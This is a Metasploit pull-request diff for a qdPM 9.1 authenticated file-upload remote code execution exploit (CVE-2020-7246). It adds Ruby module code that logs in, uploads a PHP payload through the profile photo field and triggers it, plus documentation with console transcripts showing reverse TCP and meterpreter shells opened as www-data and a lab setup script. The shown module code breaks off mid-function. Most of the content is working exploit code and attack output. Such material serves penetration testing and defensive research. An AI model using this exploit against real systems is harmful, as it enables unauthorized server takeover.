### PR TITLE
qdPM 9.1 - Authenticated Remote Code Execution (CVE-2020-7246)

### DIFF
--- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
+++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
@@ -19,22 +19,24 @@ The module has been tested against qdPM version 9.1
 
 ## Options
 
-  **EMAIL**
-  [Required]
+  **EMAIL**  
+  [Required]  
   The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not.
 
-  **PASSWORD**
-  [Required]
+  **PASSWORD**  
+  [Required]  
   The password of the user you are trying to exploit.
 
-  **TARGETURI**
+  **TARGETURI**  
   The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder.
 
 ## Scenarios
 
 As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected.
-
+  
+   
   **Attacking with a generic PHP payload, OS independed**
+
     ```
     [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
     target => Generic (PHP Payload)

--- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
+++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
@@ -1,0 +1,210 @@
+## Vulnerable Application
+
+This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccoutnt/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be eploited by uploading a PHP script and invoking it by making a request to it. 
+The script will run with the same privileges as the web server.
+The module has been tested against qdPM version 9.1
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/qdpm_authenticated_rce`
+- [ ] `set EMAIL <email>`
+- [ ] `set PASSWORD <password>`
+- [ ] `set TARGETURI <target_uri>`
+- [ ] `set RHOST <rhost>`
+- [ ] `set RPORT <rport>`
+- [ ] `exploit`
+- [ ] Add SSL, Proxy, and VHOST options if needed.
+- [ ] Verify that a new session is created.
+
+## Options
+
+  **EMAIL**
+  [Required]
+  The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not.
+
+  **PASSWORD**
+  [Required]
+  The password of the user you are trying to exploit.
+
+  **TARGETURI**
+  The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder.
+
+## Scenarios
+
+As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected.
+
+  **Attacking with a generic PHP payload, OS independed**
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
+    target => Generic (PHP Payload)
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
+    payload => php/meterpreter/reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1123 bytes)...
+    [*] Executing 'JGvak.php'
+    [*] Sending stage (39927 bytes) to 192.168.2.177
+    [!] Removing: 993379-JGvak.php
+    [*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200
+
+    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+    Server username: www-data
+    ```
+
+**Attacking a Linux x86 target**
+
+  Stageless meterpreter.
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x86
+    target => Linux x86
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/meterpreter_reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1481231 bytes)...
+    [-] Unable to upload
+    [*] Exploit completed, but no session was created.
+    ```
+
+  Stageless reverse TCP shell.
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x86
+    target => Linux x86
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/shell_reverse_tcp
+    payload => linux/x86/shell_reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1911 bytes)...
+    [*] Executing 'TyqPX.php'
+    [!] Removing: 430547-TyqPX.php
+    [*] Command shell session 3 opened (192.168.2.177:4444 -> 192.168.2.177:43818) at 2022-06-14 10:09:19 +0200
+    
+    whoami
+    www-data
+    ```
+
+  Staged meterpreter
+    
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x86
+    target => Linux x86
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/meterpreter/reverse_tcp
+    payload => linux/x86/meterpreter/reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1940 bytes)...
+    [*] Executing 'koTYT.php'
+    [*] Sending stage (989032 bytes) to 192.168.2.177
+    [!] Removing: 776342-koTYT.php
+    [*] Meterpreter session 4 opened (192.168.2.177:4444 -> 192.168.2.177:43820) at 2022-06-14 10:20:21 +0200
+    
+    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+    Server username: www-data
+    ```
+
+    Staged reverse TCP shell
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1978 bytes)...
+    [*] Executing 'sfePF.php'
+    [*] Sending stage (36 bytes) to 192.168.2.177
+    [!] Removing: 666994-sfePF.php
+    [*] Command shell session 5 opened (192.168.2.177:4444 -> 192.168.2.177:43822) at 2022-06-14 10:22:38 +0200
+    
+    whoami
+    www-data
+    ```
+
+**Attacking a Linux x64 target**
+  
+  Stageless meterpreter
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x64
+    target => Linux x64
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/meterpreter_reverse_tcp
+    payload => linux/x64/meterpreter_reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1394916 bytes)...
+    [-] Unable to upload
+    [*] Exploit completed, but no session was created.
+    ```
+  
+  Stageless reverse TCP shell
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x64
+    target => Linux x64
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/shell_reverse_tcp
+    payload => linux/x64/shell_reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (1978 bytes)...
+    [*] Executing 'SXyvv.php'
+    [!] Removing: 938792-SXyvv.php
+    [*] Command shell session 6 opened (192.168.2.177:4444 -> 192.168.2.177:43824) at 2022-06-14 10:25:54 +0200
+    
+    whoami
+    www-data
+    ```
+
+  Staged meterpreter
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x64
+    target => Linux x64
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/meterpreter/reverse_tcp
+    payload => linux/x64/meterpreter/reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (2028 bytes)...
+    [*] Executing 'RJAVK.php'
+    [*] Sending stage (3020772 bytes) to 192.168.2.177
+    [!] Removing: 192508-RJAVK.php
+    [*] Meterpreter session 7 opened (192.168.2.177:4444 -> 192.168.2.177:43826) at 2022-06-14 10:26:52 +0200
+    
+    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+    Server username: www-data
+    ```
+
+  Staged reverse TCP shell
+
+    ```
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/shell/reverse_tcp
+    payload => linux/x64/shell/reverse_tcp
+    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.177:4444
+    [*] Attempt to login with 'johndoe@localhost.com:easyone'
+    [*] Uploading PHP payload (2067 bytes)...
+    [*] Executing 'NkTZj.php'
+    [*] Sending stage (38 bytes) to 192.168.2.177
+    [!] Removing: 531068-NkTZj.php
+    [*] Command shell session 8 opened (192.168.2.177:4444 -> 192.168.2.177:43828) at 2022-06-14 10:28:12 +0200
+    
+    whoami
+    www-data
+    ```

--- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
+++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccoutnt/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be eploited by uploading a PHP script and invoking it by making a request to it. 
+This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccount/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be exploited by uploading a PHP script and invoking it by making a request to it. 
 The script will run with the same privileges as the web server.
 The module has been tested against qdPM version 9.1
 
@@ -37,24 +37,24 @@ As it can be shown by the following scenarios, the exploit works reliably agains
    
   **Attacking with a generic PHP payload, OS independed**
 
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
-    target => Generic (PHP Payload)
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
-    payload => php/meterpreter/reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+```
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
+target => Generic (PHP Payload)
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
 
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1123 bytes)...
-    [*] Executing 'JGvak.php'
-    [*] Sending stage (39927 bytes) to 192.168.2.177
-    [!] Removing: 993379-JGvak.php
-    [*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200
+[*] Started reverse TCP handler on 192.168.2.177:4444
+[*] Attempt to login with 'johndoe@localhost.com:easyone'
+[*] Uploading PHP payload (1123 bytes)...
+[*] Executing 'JGvak.php'
+[*] Sending stage (39927 bytes) to 192.168.2.177
+[!] Removing: 993379-JGvak.php
+[*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200
 
-    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
-    Server username: www-data
-    ```
+(Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+Server username: www-data
+```
 
 ## Installation
 

--- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
+++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md
@@ -56,157 +56,56 @@ As it can be shown by the following scenarios, the exploit works reliably agains
     Server username: www-data
     ```
 
-**Attacking a Linux x86 target**
+## Installation
 
-  Stageless meterpreter.
+QDPM 9.1 relies on outdated software, and installing it can be quite nuanced. Please run the provided script to get the application set up together with a web server, the right version of PHP, and MySQL. This is tested on a fresh installation of Ubuntu Server 22.04.
 
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x86
-    target => Linux x86
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/meterpreter_reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1481231 bytes)...
-    [-] Unable to upload
-    [*] Exploit completed, but no session was created.
-    ```
+```
+apt install software-properties-common -y
+add-apt-repository ppa:ondrej/php
+apt update
+apt install -y nginx php7.3-fpm php7.3-mysql php7.3-xml php7.3-gd mariadb-server unzip wget
+systemctl enable --now mariadb.service php7.3-fpm.service
+mysql -e "UPDATE mysql.user SET Password = PASSWORD('password') WHERE User = 'root'"
+mysql -e "DROP USER ''@'$(hostname)'"
+mysql -e "DROP DATABASE test"
+mysql -e "FLUSH PRIVILEGES"
+mysql -e "CREATE DATABASE qdpm_db default charset utf8"
+mysql -e "CREATE USER 'user'@'localhost' IDENTIFIED BY 'pass'"
+mysql -e "GRANT ALL PRIVILEGES ON qdpm_db.* TO 'user'@'localhost';"
+cd /opt
+wget https://www.exploit-db.com/apps/f922670e98bcbcff923d9bfaf430e669-qdPM_9.1.zip -O qdPM_9.1.zip
+unzip -d /var/www/html/qdpm qdPM_9.1.zip
+rm qdPM_9.1.zip
+chown -R www-data:www-data /var/www/html/qdpm/
+rm /etc/nginx/sites-available/default
+rm /etc/nginx/sites-enabled/default
+tee -a /etc/nginx/sites-available/default > /dev/null <<EOT
+server {
+    listen 80 default_server;
+    listen [::]:80 default_server;
+    root /var/www/html/qdpm/;
+    index index.php;
 
-  Stageless reverse TCP shell.
+    location / {
+        try_files \$uri /index.php\$is_args\$args;
+    }
 
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x86
-    target => Linux x86
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/shell_reverse_tcp
-    payload => linux/x86/shell_reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1911 bytes)...
-    [*] Executing 'TyqPX.php'
-    [!] Removing: 430547-TyqPX.php
-    [*] Command shell session 3 opened (192.168.2.177:4444 -> 192.168.2.177:43818) at 2022-06-14 10:09:19 +0200
-    
-    whoami
-    www-data
-    ```
+    location ~* \.php$ {
+        fastcgi_pass unix:/var/run/php/php7.3-fpm.sock;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME \$realpath_root\$fastcgi_script_name;
+        fastcgi_param DOCUMENT_ROOT \$realpath_root;
+    }
 
-  Staged meterpreter
-    
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x86
-    target => Linux x86
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/meterpreter/reverse_tcp
-    payload => linux/x86/meterpreter/reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1940 bytes)...
-    [*] Executing 'koTYT.php'
-    [*] Sending stage (989032 bytes) to 192.168.2.177
-    [!] Removing: 776342-koTYT.php
-    [*] Meterpreter session 4 opened (192.168.2.177:4444 -> 192.168.2.177:43820) at 2022-06-14 10:20:21 +0200
-    
-    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
-    Server username: www-data
-    ```
+    error_log /var/log/nginx/qdpm_error.log;
+    access_log /var/log/nginx/qdpm_access.log;
+}
+EOT
+ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/
+systemctl start nginx.service
+systemctl reload nginx.service
+```
 
-    Staged reverse TCP shell
-
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x86/shell/reverse_tcp
-    payload => linux/x86/shell/reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1978 bytes)...
-    [*] Executing 'sfePF.php'
-    [*] Sending stage (36 bytes) to 192.168.2.177
-    [!] Removing: 666994-sfePF.php
-    [*] Command shell session 5 opened (192.168.2.177:4444 -> 192.168.2.177:43822) at 2022-06-14 10:22:38 +0200
-    
-    whoami
-    www-data
-    ```
-
-**Attacking a Linux x64 target**
-  
-  Stageless meterpreter
-
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x64
-    target => Linux x64
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/meterpreter_reverse_tcp
-    payload => linux/x64/meterpreter_reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1394916 bytes)...
-    [-] Unable to upload
-    [*] Exploit completed, but no session was created.
-    ```
-  
-  Stageless reverse TCP shell
-
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x64
-    target => Linux x64
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/shell_reverse_tcp
-    payload => linux/x64/shell_reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (1978 bytes)...
-    [*] Executing 'SXyvv.php'
-    [!] Removing: 938792-SXyvv.php
-    [*] Command shell session 6 opened (192.168.2.177:4444 -> 192.168.2.177:43824) at 2022-06-14 10:25:54 +0200
-    
-    whoami
-    www-data
-    ```
-
-  Staged meterpreter
-
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Linux\ x64
-    target => Linux x64
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/meterpreter/reverse_tcp
-    payload => linux/x64/meterpreter/reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (2028 bytes)...
-    [*] Executing 'RJAVK.php'
-    [*] Sending stage (3020772 bytes) to 192.168.2.177
-    [!] Removing: 192508-RJAVK.php
-    [*] Meterpreter session 7 opened (192.168.2.177:4444 -> 192.168.2.177:43826) at 2022-06-14 10:26:52 +0200
-    
-    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
-    Server username: www-data
-    ```
-
-  Staged reverse TCP shell
-
-    ```
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload linux/x64/shell/reverse_tcp
-    payload => linux/x64/shell/reverse_tcp
-    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.177:4444
-    [*] Attempt to login with 'johndoe@localhost.com:easyone'
-    [*] Uploading PHP payload (2067 bytes)...
-    [*] Executing 'NkTZj.php'
-    [*] Sending stage (38 bytes) to 192.168.2.177
-    [!] Removing: 531068-NkTZj.php
-    [*] Command shell session 8 opened (192.168.2.177:4444 -> 192.168.2.177:43828) at 2022-06-14 10:28:12 +0200
-    
-    whoami
-    www-data
-    ```
+If the script runs successfully, you should have a webserver serving the application on port 80.  
+Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against.

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -90,31 +90,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_new_session(cli)
-    print_warning("Removing: #{@clean_file}")
-    begin
-      if cli.type == 'meterpreter'
-        cli.fs.file.rm(@clean_file)
-      else
-        cli.shell_command_token("rm #{@clean_file}")
+    @clean_files.each do |clean_file|
+      print_warning("Removing: #{clean_file}")
+      begin
+        if cli.type == 'meterpreter'
+          cli.fs.file.rm(clean_file)
+        else
+          cli.shell_command_token("rm #{clean_file}")
+        end
+      rescue ::StandardError => e
+        print_error("Unable to remove #{clean_file}: #{e.message}")
       end
-    rescue ::StandardError => e
-      print_error("Unable to remove #{@clean_file}: #{e.message}")
     end
-  end
-
-  def get_write_exec_payload_linux(fname, _data)
-    p = Rex::Text.encode_base64(generate_payload_exe)
-    php = %|
-    <?php
-    $f = fopen("#{fname}", "wb");
-    fwrite($f, base64_decode("#{p}"));
-    fclose($f);
-    exec("chmod 777 #{fname}");
-    exec("#{fname}");
-    ?>
-    |
-    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
-    return php
   end
 
   def get_write_exec_payload_win(fname, _data)
@@ -131,7 +118,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return php
   end
 
-  # Login function
   def login(base, username, password)
     res = send_request_cgi({
       'method' => 'GET',
@@ -261,8 +247,11 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     home_page = res.get_html_document
     backdoor = home_page.at("//input[@name='users[photo_preview]']/@value")
-    @clean_file = backdoor
-    register_files_for_cleanup(@clean_file)
+    if @clean_files
+      @clean_files << backdoor
+    else
+      @clean_files = [backdoor]
+    end
     send_request_cgi({
       'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")
     })
@@ -280,18 +269,17 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
-    # p = get_write_exec_payload
     case target['Platform']
     when 'php'
       p = get_write_exec_payload
     when 'linux'
-      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
-      bin = generate_payload_exe
-      p = get_write_exec_payload_linux("/tmp/#{bin_name}", bin)
+      p = get_write_exec_payload(unlink_self: true)
     when 'win'
       bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
       bin = generate_payload_exe
+      @clean_files = ["C:\\Windows\\Temp\\#{bin_name}"]
       p = get_write_exec_payload_win("C:\\Windows\\Temp\\#{bin_name}", bin)
+      print_warning("C:\\Windows\\Temp\\#{bin_name} will require manual cleanup")
     end
 
     print_status("Uploading PHP payload (#{p.length} bytes)...")

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'nokogiri'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 

--- a/modules/exploits/multi/http/qdpm_authenticated_rce.rb
+++ b/modules/exploits/multi/http/qdpm_authenticated_rce.rb
@@ -1,0 +1,233 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'nokogiri'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',
+        'Description' => %q{
+          A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.
+          An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal
+          vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.
+          NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Rishal Dwivedi (Loginsoft)', # Discovery
+          'Leon Trappett (thepcn3rd)', # PoC
+          'Giacomo Casoni' # Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-7246'],
+          ['EDB', 'https://www.exploit-db.com/exploits/50175']
+        ],
+        'Payload' => {
+          'BadChars' => "\x00"
+        },
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'Platform' => %w[linux php],
+        'Targets' => [
+          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-11-21',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['IOC_IN_LOGS'],
+          'SideEffects' => ['REPEATABLE_SESSION']
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),
+        OptString.new('USERNAME', [true, 'The username to login with']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ]
+    )
+
+    self.needs_cleanup = true
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path)
+    base = File.dirname("#{uri}.")
+    res = send_request_raw({ 'uri' => normalize_uri(base, '/index.php') })
+    login_page = res.get_html_document
+    begin
+      version = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f
+    rescue StandardError
+      return Exploit::CheckCode::Unknown
+    end
+    if version <= 9.1
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def on_new_session(cli)
+    print_warning("Removing: #{@clean_file}")
+    begin
+      if cli.type == 'meterpreter'
+        cli.fs.file.rm(@clean_file)
+      else
+        cli.shell_command_token("rm #{@clean_file}")
+      end
+    rescue ::StandardError => e
+      print_error("Unable to remove #{@clean_file}: #{e.message}")
+    end
+  end
+
+  # Login function
+  def login(base, username, password)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("#{base}/index.php/login"),
+      'keep_cookies' => true
+    })
+    login_page = res.get_html_document
+    csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}/index.php/login"),
+      'vars_post' => {
+        'login[email]' => username,
+        'login[password]' => password,
+        'login[_csrf_token]' => csrf_token
+      },
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}/#{base}/index.php/login"
+      }
+    })
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => "#{base}index.php/myAccount",
+      'headers' => {
+        'Host' => rhost.to_s
+      }
+    })
+    account_page = res.get_html_document
+    begin
+      userid = account_page.at("input[@name='users[id]']/@value").text.strip
+    rescue StandardError
+      print_error('The designated admin account does not have a user ID.')
+      return {}
+    end
+    username = account_page.at("input[@name='users[name]']/@value").text.strip
